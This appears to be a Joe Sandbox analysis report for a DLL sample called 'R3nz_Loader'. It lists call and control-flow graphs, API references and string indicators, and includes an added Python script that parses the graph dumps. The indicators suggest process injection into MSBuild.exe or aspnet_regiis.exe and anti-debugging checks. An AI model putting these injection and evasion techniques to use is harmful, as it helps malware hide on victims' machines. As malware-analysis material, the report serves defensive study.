10878->10879 10882 6cef663e 10878->10882 10880 6cef66f6 10879->10880 10883 6cef3f43 _free 14 API calls 10879->10883 10946 6cef6799 10880->10946 10882->10879 10884 6cef6671 10882->10884 10889 6cef3f43 _free 14 API calls 10882->10889 10885 6cef66ca 10883->10885 10886 6cef6693 10884->10886 10894 6cef3f43 _free 14 API calls 10884->10894 10887 6cef3f43 _free 14 API calls 10885->10887 10888 6cef3f43 _free 14 API calls 10886->10888 10890 6cef66dd 10887->10890 10891 6cef669d 10888->10891 10893 6cef6666 10889->10893 10895 6cef3f43 _free 14 API calls 10890->10895 10896 6cef3f43 _free 14 API calls 10891->10896 10892 6cef6764 10897 6cef3f43 _free 14 API 
calls 10892->10897 10906 6cef8557 10893->10906 10899 6cef6688 10894->10899 10900 6cef66eb 10895->10900 10896->10879 10901 6cef676a 10897->10901 10934 6cef8655 10899->10934 10904 6cef3f43 _free 14 API calls 10900->10904 10901->10872 10902 6cef6704 10902->10892 10905 6cef3f43 14 API calls _free 10902->10905 10904->10880 10905->10902 10907 6cef8568 10906->10907 10933 6cef8651 10906->10933 10908 6cef3f43 _free 14 API calls 10907->10908 10909 6cef8579 10907->10909 10908->10909 10910 6cef3f43 _free 14 API calls 10909->10910 10912 6cef858b 10909->10912 10910->10912 10911 6cef859d 10913 6cef85af 10911->10913 10915 6cef3f43 _free 14 API calls 10911->10915 10912->10911 10914 6cef3f43 _free 14 API calls 10912->10914 10916 6cef85c1 10913->10916 10917 6cef3f43 _free 14 API calls 10913->10917 10914->10911 10915->10913 10918 6cef85d3 10916->10918 10919 6cef3f43 _free 14 API calls 10916->10919 10917->10916 10920 6cef85e5 10918->10920 10922 6cef3f43 _free 14 API calls 10918->10922 10919->10918 10921 6cef85f7 10920->10921 10923 6cef3f43 _free 14 API calls 10920->10923 10924 6cef8609 10921->10924 10925 6cef3f43 _free 14 API calls 10921->10925 10922->10920 10923->10921 10926 6cef861b 10924->10926 10927 6cef3f43 _free 14 API calls 10924->10927 10925->10924 10928 6cef862d 10926->10928 10930 6cef3f43 _free 14 API calls 10926->10930 10927->10926 10929 6cef863f 10928->10929 10931 6cef3f43 _free 14 API calls 10928->10931 10932 6cef3f43 _free 14 API calls 10929->10932 10929->10933 10930->10928 10931->10929 10932->10933 10933->10884 10935 6cef8662 10934->10935 10945 6cef86ba 10934->10945 10936 6cef3f43 _free 14 API calls 10935->10936 10937 6cef8672 10935->10937 10936->10937 10938 6cef8684 10937->10938 10939 6cef3f43 _free 14 API calls 10937->10939 10940 6cef8696 10938->10940 10942 6cef3f43 _free 14 API calls 10938->10942 10939->10938 10941 6cef86a8 10940->10941 10943 6cef3f43 _free 14 API calls 10940->10943 10944 6cef3f43 _free 14 API calls 10941->10944 10941->10945 10942->10940 10943->10941 
[Call graph (continued; rendered as an image on the original page). The remaining nodes, 6cef0250 through 6cefa6ae, are the module's MSVC C runtime startup and teardown code rather than sample-specific logic: heap and TLS management (_free, RtlAllocateHeap, HeapSize, HeapReAlloc, TlsAlloc/TlsGetValue/TlsFree), critical-section locking (EnterCriticalSection/LeaveCriticalSection/DeleteCriticalSection), GetLastError/SetLastError, the DllMain dispatch path (__DllMainCRTStartup@12, dllmain_raw, dllmain_crt_dispatch, GetModuleHandleW/GetModuleHandleExW/GetProcAddress/FreeLibrary), process-exit paths (GetPEB, GetCurrentProcess/TerminateProcess, ExitProcess), security-cookie and exception setup (_ValidateLocalCookies, IsProcessorFeaturePresent, SetUnhandledExceptionFilter/UnhandledExceptionFilter, GetSystemTimeAsFileTime/GetCurrentThreadId/GetCurrentProcessId/QueryPerformanceCounter), stdio initialisation (GetStartupInfoW, GetFileType, FlushFileBuffers), InterlockedFlushSList, DecodePointer and RaiseException.]
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: Virtual$Memory$Write$Thread$CloseHandle$AllocateCreateRead$ContextProcessResumeWindow$AllocConsoleShow
• String ID: ma_$,/s$<Mj$<Mj$?b\x$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$MZx$OQ!Y$OQ!Y$TD4+$b'aX$c/$kernel32.dll$ntdll.dll$s"E&$w.qo$w.qo$w]~$w]~$~zm$J/$rg)
• API String ID: 349478264-3264118132
• Opcode ID: 3a0c55d25b95f289ec98d2fc4157df03fe0872857c79a8c19a8489331040f14e
• Instruction ID: 2eb91bb33cbbe170ab75ae9b0c72f79162c9efe6afb22ec1e439b026c4b9aad3
• Opcode Fuzzy Hash: 3a0c55d25b95f289ec98d2fc4157df03fe0872857c79a8c19a8489331040f14e
• Instruction Fuzzy Hash: 17D30636A502118FDB18CE3CC9D43CD77F2AB4B3A4F209199D419DBBA5D6358E8A8F11
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: File$HandleModule$CloseCreateProtectViewVirtual$CurrentMappingNameProcess$Information
• String ID: @$d,>$pYof
• API String ID: 2573367501-2859445575
• Opcode ID: 046d4690d8713550a57dc717142d1362ebb53a9273e0cc02bca20a0a67fd116f
• Instruction ID: 00c8a58b783375468f30d620dff84176b776be62e826b966f5955e2b073845a5
• Opcode Fuzzy Hash: 046d4690d8713550a57dc717142d1362ebb53a9273e0cc02bca20a0a67fd116f
• Instruction Fuzzy Hash: DB330032A082158FDB08DF7CC9947CD77F2AB5A394F209559D419DBB95C3368A8ACF02

Control-flow Graph
[Graph rendered as an image on the original page; recoverable content: the function at 6cee6b80 (basic blocks 6cee6b80 through 6cee7d88). Block 6cee6bd1 heads a long chain of compare-and-branch blocks (6cee6be2, 6cee6bf5, 6cee6c08, ... 6cee701d), each of which either falls through to the next comparison or dispatches to one handler block; nearly every handler ends at 6cee7d88, which jumps back to 6cee6bd1, so the function is a switch-like dispatcher loop. Handlers of note: 6cee73b5-6cee73fc calls NtQueryInformationProcess; 6cee71b0-6cee7229 calls GetModuleHandleW (ref 6CEE71D8) and then 6cee43e0 and 6cef16c0; 6cee7b0d-6cee7b27 calls 6cef0a90 (_ValidateLocalCookies in the call graph) and has no successor, i.e. it is the exit block. The legend distinguished executed from non-executed blocks by colour, which the text does not preserve.]
APIs
• GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?), ref: 6CEE71D8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: HandleModule
• String ID: (Tls$9.=H$9.=H$>Be8$>Be8$NtQueryInformationProcess$ntdll.dll
• API String ID: 4139908857-3027456121
• Opcode ID: b1f5dd322a2e3cab1dc76725cccbcae94872fea7caac743b6c1fb4c790531157
• Instruction ID: f4e8699c3d5859ab3a79636d33726b546fcf3f1f1a318c43d905255510a3a1fb
• Opcode Fuzzy Hash: b1f5dd322a2e3cab1dc76725cccbcae94872fea7caac743b6c1fb4c790531157
• Instruction Fuzzy Hash: 36922532A642058FDF08DE7CD5D53DD37F29B8B3A8F309515D421DBBA6C62A990B8B01

Control-flow Graph
control_flow_graph 1622 6cef0bf8-6cef0c0b call 6cef1460 1625 6cef0c0d-6cef0c0f 1622->1625 1626 6cef0c11-6cef0c33 call 6cef1040 1622->1626 1627 6cef0c7a-6cef0c89 1625->1627 1630 6cef0c35-6cef0c78 call 6cef110b call 6cef0fc7 call 6cef1429 call 6cef0c8d call 6cef12ac call 6cef0c9a 1626->1630 1631 6cef0ca0-6cef0cb9 call 6cef12da call 6cef1460 1626->1631 1630->1627 1642 6cef0cbb-6cef0cc1 1631->1642 1643 6cef0cca-6cef0cd1 1631->1643 1642->1643 1645 6cef0cc3-6cef0cc5 1642->1645 1646 6cef0cdd-6cef0cf1 dllmain_raw 1643->1646 1647 6cef0cd3-6cef0cd6 1643->1647 1649 6cef0da3-6cef0db2 1645->1649 1651 6cef0d9a-6cef0da1 1646->1651 1652 6cef0cf7-6cef0d08 dllmain_crt_dispatch 1646->1652 1647->1646 1650 6cef0cd8-6cef0cdb 1647->1650 1654 6cef0d0e-6cef0d20 call 6cef0250 1650->1654 1651->1649 1652->1651 1652->1654 1661 6cef0d49-6cef0d4b 1654->1661 1662 6cef0d22-6cef0d24 1654->1662 1663 6cef0d4d-6cef0d50 1661->1663 1664 6cef0d52-6cef0d63 dllmain_crt_dispatch 1661->1664 1662->1661 1665 6cef0d26-6cef0d44 call 6cef0250 call 6cef0bf8 dllmain_raw 1662->1665 1663->1651 1663->1664 1664->1651 1667 6cef0d65-6cef0d97 dllmain_raw 1664->1667 1665->1661 1667->1651
APIs
• __RTC_Initialize.LIBCMT ref: 6CEF0C3F
• ___scrt_uninitialize_crt.LIBCMT ref: 6CEF0C59
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: Initialize___scrt_uninitialize_crt
• String ID:
• API String ID: 2442719207-0
• Opcode ID: a29563e2798693384503791fe5548f5c94308cfae1bf34208c57f4795615b96c
• Instruction ID: aa78a6a6bca733a35864f1a6efe4238b6251a6774f81f2a1d26c41f8683298c8
• Opcode Fuzzy Hash: a29563e2798693384503791fe5548f5c94308cfae1bf34208c57f4795615b96c
• Instruction Fuzzy Hash: 2641E572E05698AFDB109F99CC40BEE7A75EB81B9CF304119E834A7B40D7319D079BA0

Control-flow Graph
control_flow_graph 1672 6cef0ca8-6cef0cb9 call 6cef1460 1675 6cef0cbb-6cef0cc1 1672->1675 1676 6cef0cca-6cef0cd1 1672->1676 1675->1676 1677 6cef0cc3-6cef0cc5 1675->1677 1678 6cef0cdd-6cef0cf1 dllmain_raw 1676->1678 1679 6cef0cd3-6cef0cd6 1676->1679 1680 6cef0da3-6cef0db2 1677->1680 1682 6cef0d9a-6cef0da1 1678->1682 1683 6cef0cf7-6cef0d08 dllmain_crt_dispatch 1678->1683 1679->1678 1681 6cef0cd8-6cef0cdb 1679->1681 1684 6cef0d0e-6cef0d20 call 6cef0250 1681->1684 1682->1680 1683->1682 1683->1684 1687 6cef0d49-6cef0d4b 1684->1687 1688 6cef0d22-6cef0d24 1684->1688 1689 6cef0d4d-6cef0d50 1687->1689 1690 6cef0d52-6cef0d63 dllmain_crt_dispatch 1687->1690 1688->1687 1691 6cef0d26-6cef0d44 call 6cef0250 call 6cef0bf8 dllmain_raw 1688->1691 1689->1682 1689->1690 1690->1682 1693 6cef0d65-6cef0d97 dllmain_raw 1690->1693 1691->1687 1693->1682
APIs
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: dllmain_raw$dllmain_crt_dispatch
• String ID:
• API String ID: 3136044242-0
• Opcode ID: 7be2483f6991ee4be8b89b5708fb61084043a66057ea4e240dfc396afecd568b
• Instruction ID: bba6a3742c3442796768765a71d04e9fbca1bc946cc9ad622a363635769ce354
• Opcode Fuzzy Hash: 7be2483f6991ee4be8b89b5708fb61084043a66057ea4e240dfc396afecd568b
• Instruction Fuzzy Hash: 05219472D01699ABDB214F55CC40AAE7A79EB81B9CF214119F83867B10D3319D478BE0
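The control_flow_graph lines in these records are flattened edge lists, which are awkward to read but easy to turn back into a graph. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or its IDA plugin output. It parses the dump format as it appears here (block id, one address or a start-end range, optional `call <callee>` pairs and bare symbol or API names the block references, then `src->dst` edges), and reports the entry block, exit blocks, blocks unreachable from the entry, blocks that reference an API, and the set of callees. The sample input is the 6cef0ca8 graph copied from the record directly above; the one-token address form (for example `1703 6cef0bde` in the 6cef0af1 graph) is handled as well. The grammar is inferred from the dumps on this page rather than taken from Joe Sandbox documentation, and the executed/not-executed colouring of the rendered graph is not carried by the text dump, so it cannot be recovered here.

```python
"""Parse the flattened Joe Sandbox 'control_flow_graph' dumps in this report.

Each dump is one whitespace-separated line. A basic block appears as
'<id> <start>-<end>' (or '<id> <addr>' for a one-address block), optionally
followed by 'call <callee>' pairs and bare symbol/API names the block
references; an edge appears as '<src>-><dst>'. This grammar is inferred from
the dumps on this page, not taken from Joe Sandbox documentation.
"""
import re
from collections import deque

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-fA-F]+(?:-[0-9a-fA-F]+)?$")

# Copied verbatim from the 6cef0ca8 record above (dllmain_raw / dllmain_crt_dispatch).
SAMPLE_CFG = (
    "control_flow_graph 1672 6cef0ca8-6cef0cb9 call 6cef1460 1675 6cef0cbb-6cef0cc1 1672->1675 "
    "1676 6cef0cca-6cef0cd1 1672->1676 1675->1676 1677 6cef0cc3-6cef0cc5 1675->1677 "
    "1678 6cef0cdd-6cef0cf1 dllmain_raw 1676->1678 1679 6cef0cd3-6cef0cd6 1676->1679 "
    "1680 6cef0da3-6cef0db2 1677->1680 1682 6cef0d9a-6cef0da1 1678->1682 "
    "1683 6cef0cf7-6cef0d08 dllmain_crt_dispatch 1678->1683 1679->1678 1681 6cef0cd8-6cef0cdb 1679->1681 "
    "1684 6cef0d0e-6cef0d20 call 6cef0250 1681->1684 1682->1680 1683->1682 1683->1684 "
    "1687 6cef0d49-6cef0d4b 1684->1687 1688 6cef0d22-6cef0d24 1684->1688 1689 6cef0d4d-6cef0d50 1687->1689 "
    "1690 6cef0d52-6cef0d63 dllmain_crt_dispatch 1687->1690 1688->1687 "
    "1691 6cef0d26-6cef0d44 call 6cef0250 call 6cef0bf8 dllmain_raw 1688->1691 1689->1682 1689->1690 "
    "1690->1682 1693 6cef0d65-6cef0d97 dllmain_raw 1690->1693 1691->1687 1693->1682"
)


def parse_cfg(line):
    """Return (nodes, edges); nodes maps block id -> {start, end, calls, refs}."""
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes, edges, cur, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        if NODE_ID_RE.match(tok):
            # A block id is always followed by its address or address range.
            if i + 1 >= len(tokens) or not ADDR_RE.match(tokens[i + 1]):
                raise ValueError("block %s has no address" % tok)
            start, _, end = tokens[i + 1].partition("-")
            cur = int(tok)
            nodes[cur] = {"start": int(start, 16), "end": int(end or start, 16),
                          "calls": [], "refs": []}
            i += 2
            continue
        if cur is None:
            raise ValueError("annotation %r before any block" % tok)
        if tok == "call":
            nodes[cur]["calls"].append(int(tokens[i + 1], 16))
            i += 2
        else:
            nodes[cur]["refs"].append(tok)  # e.g. dllmain_raw, GetStdHandle
            i += 1
    return nodes, edges


def successors(nodes, edges):
    """Adjacency map; tolerates edges into blocks the dump does not define."""
    succ = {n: [] for n in nodes}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    return succ


def reachable_from(nodes, edges, entry):
    """Breadth-first walk of the CFG starting at block id `entry`."""
    succ = successors(nodes, edges)
    seen, queue = {entry}, deque([entry])
    while queue:
        for dst in succ.get(queue.popleft(), []):
            if dst not in seen:
                seen.add(dst)
                queue.append(dst)
    return seen


def summarize(line):
    """Entry, exits, unreachable blocks and API-referencing blocks of one dump."""
    nodes, edges = parse_cfg(line)
    entry = min(nodes, key=lambda n: nodes[n]["start"])  # lowest address
    succ = successors(nodes, edges)
    reach = reachable_from(nodes, edges, entry)
    return {
        "entry": nodes[entry]["start"],
        "blocks": len(nodes),
        "edges": len(edges),
        "exits": sorted(nodes[n]["start"] for n in nodes if not succ[n]),
        "unreachable": sorted(nodes[n]["start"] for n in nodes if n not in reach),
        "api_blocks": {nodes[n]["start"]: nodes[n]["refs"] for n in nodes if nodes[n]["refs"]},
        "callees": sorted({c for n in nodes for c in nodes[n]["calls"]}),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_CFG).items():
        print("%-12s %s" % (key, hex(value) if isinstance(value, int) else value))
```

Run it on any of the control_flow_graph lines in this section; for the partial graph at the top of the section the edges into block 1441 point outside the visible dump, which the adjacency map tolerates, so the walk still completes.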

Control-flow Graph
control_flow_graph 1698 6cef0af1-6cef0b07 call 6cef1460 call 6cef113b 1703 6cef0bde 1698->1703 1704 6cef0b0d-6cef0b25 call 6cef1040 1698->1704 1705 6cef0be0-6cef0bef 1703->1705 1708 6cef0b2b-6cef0b3c call 6cef109d 1704->1708 1709 6cef0bf0-6cef0bf7 call 6cef12da 1704->1709 1714 6cef0b3e-6cef0b57 call 6cef13fd call 6cef0fbb call 6cef0fdf call 6cef2721 1708->1714 1715 6cef0b8b-6cef0b99 call 6cef0bd4 1708->1715 1732 6cef0b5c-6cef0b60 1714->1732 1715->1703 1720 6cef0b9b-6cef0ba5 call 6cef12d4 1715->1720 1726 6cef0ba7-6cef0bb0 call 6cef11fb 1720->1726 1727 6cef0bc6-6cef0bcf 1720->1727 1726->1727 1733 6cef0bb2-6cef0bc4 1726->1733 1727->1705 1732->1715 1734 6cef0b62-6cef0b69 call 6cef1072 1732->1734 1733->1727 1734->1715 1738 6cef0b6b-6cef0b88 call 6cef26dc 1734->1738 1738->1715
APIs
• __RTC_Initialize.LIBCMT ref: 6CEF0B3E
  • Part of subcall function 6CEF0FBB: InitializeSListHead.KERNEL32(6CF4C388,6CEF0B48,6CF000D8,00000010,6CEF0AD9,?,?,?,6CEF0D01,?,00000001,?,?,00000001,?,6CF00120), ref: 6CEF0FC0
• ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CEF0BA8
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
• String ID:
• API String ID: 3231365870-0
• Opcode ID: c450a8570a04be3909b7508ec9ea51f473e0d67841a50bd05f746a71009821f3
• Instruction ID: d8a8357a51540d37630c453d108c5cb68883d7fc2c48b514006a49af9fc91268
• Opcode Fuzzy Hash: c450a8570a04be3909b7508ec9ea51f473e0d67841a50bd05f746a71009821f3
• Instruction Fuzzy Hash: 4D21C072A4A2C99EDB00AFF48814BDD77B1AB1226CF30441DD4B167FC2CB62454FD665

Control-flow Graph
control_flow_graph 1741 6cef591d-6cef5922 1742 6cef5924-6cef593c 1741->1742 1743 6cef593e-6cef5942 1742->1743 1744 6cef594a-6cef5953 1742->1744 1743->1744 1745 6cef5944-6cef5948 1743->1745 1746 6cef5965 1744->1746 1747 6cef5955-6cef5958 1744->1747 1748 6cef59c3-6cef59c7 1745->1748 1751 6cef5967-6cef5974 GetStdHandle 1746->1751 1749 6cef595a-6cef595f 1747->1749 1750 6cef5961-6cef5963 1747->1750 1748->1742 1752 6cef59cd-6cef59d0 1748->1752 1749->1751 1750->1751 1753 6cef5976-6cef5978 1751->1753 1754 6cef5983 1751->1754 1753->1754 1755 6cef597a-6cef5981 GetFileType 1753->1755 1756 6cef5985-6cef5987 1754->1756 1755->1756 1757 6cef5989-6cef5992 1756->1757 1758 6cef59a5-6cef59b7 1756->1758 1759 6cef599a-6cef599d 1757->1759 1760 6cef5994-6cef5998 1757->1760 1758->1748 1761 6cef59b9-6cef59bc 1758->1761 1759->1748 1762 6cef599f-6cef59a3 1759->1762 1760->1748 1761->1748 1762->1748
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 6CEF5969
• GetFileType.KERNELBASE(00000000), ref: 6CEF597B
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0
• Opcode ID: 1ad674da6d66f74448fb8102230df655ff604111948907cbea83118c3c4129a3
• Instruction ID: e04ed1dc5b94efe0a8a0ad4514accad4fd76b092a8cde4977b51edccb59b9ff7
• Opcode Fuzzy Hash: 1ad674da6d66f74448fb8102230df655ff604111948907cbea83118c3c4129a3
• Instruction Fuzzy Hash: 4011DA7260A7524ADB284E3E8C88B16BAB597B723CB38A71ED0B5C6EE1C730D547C541

Control-flow Graph
control_flow_graph 1763 6cef6180-6cef618b 1764 6cef618d-6cef6192 1763->1764 1765 6cef6194-6cef6196 1763->1765 1766 6cef619a 1764->1766 1767 6cef619f-6cef61a2 call 6cef3ee6 1765->1767 1768 6cef6198 1765->1768 1766->1767 1770 6cef61a7-6cef61bd call 6cef3f43 1767->1770 1768->1766 1773 6cef61bf-6cef61e3 call 6cef3ee6 call 6cef3f43 1770->1773 1774 6cef61ea-6cef61ed 1770->1774 1773->1774 1784 6cef61e5-6cef61e9 1773->1784 1776 6cef61f2-6cef6225 call 6cef5712 1774->1776 1782 6cef6227-6cef622a 1776->1782 1783 6cef6230 1776->1783 1782->1783 1785 6cef622c-6cef622e 1782->1785 1786 6cef6237-6cef6241 1783->1786 1785->1783 1785->1786 1786->1776 1787 6cef6243-6cef6247 1786->1787
APIs
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: d0c0ffc447f17c7d8506c4786e21688bf88165fb7ef0968a47c924eaaa7411b2
• Instruction ID: bbafac8a8917bb88136c2d6b1b856e700c6537e8104913da9ef8b5bb3296f3e7
• Opcode Fuzzy Hash: d0c0ffc447f17c7d8506c4786e21688bf88165fb7ef0968a47c924eaaa7411b2
• Instruction Fuzzy Hash: 7311D372F246005BDB64EA2D9C11B8637B8675277CF24571AE635CBFC2E370D48B4640

Control-flow Graph
control_flow_graph 1788 6cef3ee6-6cef3ef1 1789 6cef3eff-6cef3f05 1788->1789 1790 6cef3ef3-6cef3efd 1788->1790 1792 6cef3f1e-6cef3f2f RtlAllocateHeap 1789->1792 1793 6cef3f07-6cef3f08 1789->1793 1790->1789 1791 6cef3f33-6cef3f3e call 6cef3ed3 1790->1791 1799 6cef3f40-6cef3f42 1791->1799 1794 6cef3f0a-6cef3f11 call 6cef6945 1792->1794 1795 6cef3f31 1792->1795 1793->1792 1794->1791 1801 6cef3f13-6cef3f1c call 6cef5b05 1794->1801 1795->1799 1801->1791 1801->1792
APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CEF3AE9,00000001,00000364,00000013,000000FF,?,00000001,6CEF3ED8,6CEF3F69,?,?,6CEF317C), ref: 6CEF3F27
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 8af45551fea44ff5d072a5296bad6856a26280021061e2863e475b9c468f28a4
• Instruction ID: 1b96e35f0f0724e57fef3b592c48724fe6d41f032be4a07b631da01a2a05aa31
• Opcode Fuzzy Hash: 8af45551fea44ff5d072a5296bad6856a26280021061e2863e475b9c468f28a4
• Instruction Fuzzy Hash: E0F0B43371A22567FB115A269C02BCB77789F92768B318022E83997B80CB60D40782E2

Strings
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID:
• String ID: Yi4$Yi4$ko,r$0\r
• API String ID: 0-151446381
• Opcode ID: c60644e2e2e36cbd8d8c3931865fdcc1822dbccf767d7de4793e2d7bce683ff8
• Instruction ID: ac168af0e0e8556e628421f9024655c9deff80ebdfb166739acaa6a18a4bf145
• Opcode Fuzzy Hash: c60644e2e2e36cbd8d8c3931865fdcc1822dbccf767d7de4793e2d7bce683ff8
• Instruction Fuzzy Hash: 1D132376B402158FCB08DE3CC9D17DD7BF2AB8B398F209255C519DBB95C63A994ACB00

APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CEF3D62
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CEF3D6C
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CEF3D79
Strings
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
